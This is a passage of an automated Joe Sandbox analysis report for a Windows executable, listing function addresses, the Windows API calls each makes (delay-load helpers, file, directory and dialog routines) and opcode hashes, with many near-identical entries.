                                                                • Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
                                                                • Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 582f5e3fc280877a96041079824e8c2ccb37f944f9ae6994bea8f4a7277e4c55
                                                              • Instruction ID: 7fba61bd371c9ee7433795befc86f5e2a046afa8ca9908f30c03d52e524e3411
                                                              • Opcode Fuzzy Hash: 582f5e3fc280877a96041079824e8c2ccb37f944f9ae6994bea8f4a7277e4c55
                                                              • Instruction Fuzzy Hash: E6A011E22A800ABC3808B282AC02C3B0B0CE0C2B20338882EF822E0280AC8008002833
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0089E3FC
                                                                • Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
                                                                • Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 5d46d32073bc188561c9a73be285a763e7ae00276808c2592281e5d6c5c78d05
                                                              • Instruction ID: 7fba61bd371c9ee7433795befc86f5e2a046afa8ca9908f30c03d52e524e3411
                                                              • Opcode Fuzzy Hash: 5d46d32073bc188561c9a73be285a763e7ae00276808c2592281e5d6c5c78d05
                                                              • Instruction Fuzzy Hash: E6A011E22A800ABC3808B282AC02C3B0B0CE0C2B20338882EF822E0280AC8008002833
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0089E3FC
                                                                • Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
                                                                • Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 143222d1ddb1cbd9287008e432e614e84e7569fd215544bfb86d5cf58bc6cb5d
                                                              • Instruction ID: 7fba61bd371c9ee7433795befc86f5e2a046afa8ca9908f30c03d52e524e3411
                                                              • Opcode Fuzzy Hash: 143222d1ddb1cbd9287008e432e614e84e7569fd215544bfb86d5cf58bc6cb5d
                                                              • Instruction Fuzzy Hash: E6A011E22A800ABC3808B282AC02C3B0B0CE0C2B20338882EF822E0280AC8008002833
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0089E3FC
                                                                • Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
                                                                • Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: d37b34f490c3c86e8db3f10d536d9aae0da9fb7ba38d75140a14f96e17b8054d
                                                              • Instruction ID: 7fba61bd371c9ee7433795befc86f5e2a046afa8ca9908f30c03d52e524e3411
                                                              • Opcode Fuzzy Hash: d37b34f490c3c86e8db3f10d536d9aae0da9fb7ba38d75140a14f96e17b8054d
                                                              • Instruction Fuzzy Hash: E6A011E22A800ABC3808B282AC02C3B0B0CE0C2B20338882EF822E0280AC8008002833
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0089E580
                                                                • Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
                                                                • Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 4fd68d9e3ddf0626785dfd33f5d204628e0795c8dfebf71324ffd2ab06af2751
                                                              • Instruction ID: 5c6e8884ea4323e29c375b18d5f52606ff150892b06eb48b83f2d0dcaeb446b0
                                                              • Opcode Fuzzy Hash: 4fd68d9e3ddf0626785dfd33f5d204628e0795c8dfebf71324ffd2ab06af2751
                                                              • Instruction Fuzzy Hash: 30A011C22A800ABC3808B2A22C02C3B0A0CE0C2B2833A882EF822C02C2BC8008000832
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0089E580
                                                                • Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
                                                                • Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 29b118bf5e7c7bed4873401cd58fdda8656674dbf5ccd49750665606c9842575
                                                              • Instruction ID: 5c6e8884ea4323e29c375b18d5f52606ff150892b06eb48b83f2d0dcaeb446b0
                                                              • Opcode Fuzzy Hash: 29b118bf5e7c7bed4873401cd58fdda8656674dbf5ccd49750665606c9842575
                                                              • Instruction Fuzzy Hash: 30A011C22A800ABC3808B2A22C02C3B0A0CE0C2B2833A882EF822C02C2BC8008000832
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0089E51F
                                                                • Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
                                                                • Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 0c23412227f4f15787156aae3bdafa3afed3e79236f356a2e75f0ce98e774050
                                                              • Instruction ID: 3226fb0e6989c37a29fe7d2a0386bb8d20569aef22a1ff590f10216bebf820c7
                                                              • Opcode Fuzzy Hash: 0c23412227f4f15787156aae3bdafa3afed3e79236f356a2e75f0ce98e774050
                                                              • Instruction Fuzzy Hash: 3DA011C22A800ABC3808B2882C02CBB0A0CE0C2F28338883EF822C0280BC800C000832
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0089E51F
                                                                • Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
                                                                • Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 5d9dbad5512f499f9aa93fec4168f04bc4dd4c814de738f1feb698e80ce5f5ee
                                                              • Instruction ID: 3226fb0e6989c37a29fe7d2a0386bb8d20569aef22a1ff590f10216bebf820c7
                                                              • Opcode Fuzzy Hash: 5d9dbad5512f499f9aa93fec4168f04bc4dd4c814de738f1feb698e80ce5f5ee
                                                              • Instruction Fuzzy Hash: 3DA011C22A800ABC3808B2882C02CBB0A0CE0C2F28338883EF822C0280BC800C000832
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0089E51F
                                                                • Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
                                                                • Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: e478f0000614973403e7a91308b306e6f85894453deda0f1daa66eb62d1cf2d7
                                                              • Instruction ID: 3226fb0e6989c37a29fe7d2a0386bb8d20569aef22a1ff590f10216bebf820c7
                                                              • Opcode Fuzzy Hash: e478f0000614973403e7a91308b306e6f85894453deda0f1daa66eb62d1cf2d7
                                                              • Instruction Fuzzy Hash: 3DA011C22A800ABC3808B2882C02CBB0A0CE0C2F28338883EF822C0280BC800C000832
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0089E51F
                                                                • Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
                                                                • Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: b77b1d3b916890995177ce5d37c6e80960b768898393adaa51c22e95c59f031f
                                                              • Instruction ID: 3226fb0e6989c37a29fe7d2a0386bb8d20569aef22a1ff590f10216bebf820c7
                                                              • Opcode Fuzzy Hash: b77b1d3b916890995177ce5d37c6e80960b768898393adaa51c22e95c59f031f
                                                              • Instruction Fuzzy Hash: 3DA011C22A800ABC3808B2882C02CBB0A0CE0C2F28338883EF822C0280BC800C000832
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0089E580
                                                                • Part of subcall function 0089E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0089E8D0
                                                                • Part of subcall function 0089E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0089E8E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 6388cef8006a180090485097d70c54412326fdf58760735b16a97d0346d78787
                                                              • Instruction ID: c88cbe3c88ae0304452ea2fc4d4e6ad3a715d1adba6bb0ddd27ff3b4a4ac8014
                                                              • Opcode Fuzzy Hash: 6388cef8006a180090485097d70c54412326fdf58760735b16a97d0346d78787
                                                              • Instruction Fuzzy Hash: FDA011C22A80083C3808B2A22C02C3B0A0CE0E2B2A33A822EF820E02C2BC8008000832
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • SetEndOfFile.KERNELBASE(?,0088903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00889F0C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: File
                                                              • String ID:
                                                              • API String ID: 749574446-0
                                                              • Opcode ID: c8b02d97def9a618b603dc8c7ebece720a0b919260c8d6e7ffcedf10f6fbf09a
                                                              • Instruction ID: 462386f9651451af1f7076706226530e846d4f7deed9a49e166e411835fd5647
                                                              • Opcode Fuzzy Hash: c8b02d97def9a618b603dc8c7ebece720a0b919260c8d6e7ffcedf10f6fbf09a
                                                              • Instruction Fuzzy Hash: FDA0113008080A8B8E002B30CA0800C3B20FB20BC030202A8A00ACA0A2CB22880B8A00
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • SetCurrentDirectoryW.KERNELBASE(?,0089AE72,C:\Users\user\Desktop,00000000,008C946A,00000006), ref: 0089AC08
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory
                                                              • String ID:
                                                              • API String ID: 1611563598-0
                                                              • Opcode ID: 703e56fd7e5db259d02bf7e40a4962e6f26c419e9759ba01995074db69bf0935
                                                              • Instruction ID: 2a7e4d5ff0e7b202bf5b4cab9f423ee2f1b085b77511001da250f3ec035ee7c6
                                                              • Opcode Fuzzy Hash: 703e56fd7e5db259d02bf7e40a4962e6f26c419e9759ba01995074db69bf0935
                                                              • Instruction Fuzzy Hash: C3A01130200200AB83000B328F0AA0EBBAABFA2B00F00C028B00080030CB30C820AA00
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00881316: GetDlgItem.USER32(00000000,00003021), ref: 0088135A
                                                                • Part of subcall function 00881316: SetWindowTextW.USER32(00000000,008B35F4), ref: 00881370
                                                              • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0089C2B1
                                                              • EndDialog.USER32(?,00000006), ref: 0089C2C4
                                                              • GetDlgItem.USER32(?,0000006C), ref: 0089C2E0
                                                              • SetFocus.USER32(00000000), ref: 0089C2E7
                                                              • SetDlgItemTextW.USER32(?,00000065,?), ref: 0089C321
                                                              • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0089C358
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0089C36E
                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0089C38C
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0089C39C
                                                              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0089C3B8
                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0089C3D4
                                                              • _swprintf.LIBCMT ref: 0089C404
                                                                • Part of subcall function 00884092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008840A5
                                                              • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0089C417
                                                              • FindClose.KERNEL32(00000000), ref: 0089C41E
                                                              • _swprintf.LIBCMT ref: 0089C477
                                                              • SetDlgItemTextW.USER32(?,00000068,?), ref: 0089C48A
                                                              • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0089C4A7
                                                              • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0089C4C7
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0089C4D7
                                                              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0089C4F1
                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0089C509
                                                              • _swprintf.LIBCMT ref: 0089C535
                                                              • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0089C548
                                                              • _swprintf.LIBCMT ref: 0089C59C
                                                              • SetDlgItemTextW.USER32(?,00000069,?), ref: 0089C5AF
                                                                • Part of subcall function 0089AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0089AF35
                                                                • Part of subcall function 0089AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,008BE72C,?,?), ref: 0089AF84
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                              • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                              • API String ID: 797121971-1840816070
                                                              • Opcode ID: c6a77248ea03d1614b6de6d188a29797905d6d06331f70bcbd1b81a9c3fa42d9
                                                              • Instruction ID: eb56a5d1e08eba207e5fd5f5c352e92a8029095402cc1455009fba38267e597d
                                                              • Opcode Fuzzy Hash: c6a77248ea03d1614b6de6d188a29797905d6d06331f70bcbd1b81a9c3fa42d9
                                                              • Instruction Fuzzy Hash: B7919372248348BBD621EBA4CC89FFB7BACFB89704F044919F645D6181D775AA048B63
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00886FAA
                                                              • _wcslen.LIBCMT ref: 00887013
                                                              • _wcslen.LIBCMT ref: 00887084
                                                                • Part of subcall function 00887A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00887AAB
                                                                • Part of subcall function 00887A9C: GetLastError.KERNEL32 ref: 00887AF1
                                                                • Part of subcall function 00887A9C: CloseHandle.KERNEL32(?), ref: 00887B00
